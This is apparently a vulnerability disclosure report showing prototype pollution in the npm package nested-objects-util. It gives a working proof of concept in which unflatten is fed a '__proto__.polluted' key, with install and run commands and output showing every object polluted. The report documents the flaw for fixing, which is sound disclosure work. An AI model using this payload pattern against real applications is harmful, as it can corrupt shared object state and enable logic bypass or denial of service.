Prototype Pollution in bonnevoyager/nested-objects-util
Valid
Reported on
Dec 21st 2020
Description
nested-objects-util
is vulnerable to Prototype Pollution
.
Proof of Concept
- Create the following PoC file:
// poc.js
var {unflatten} = require("nested-objects-util")
console.log("Before : " + {}.polluted);
unflatten({"__proto__.polluted": "Yes! Its Polluted"})
console.log("After : " + {}.polluted);
- Execute the following commands in terminal:
npm i nested-objects-util # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
to join this conversation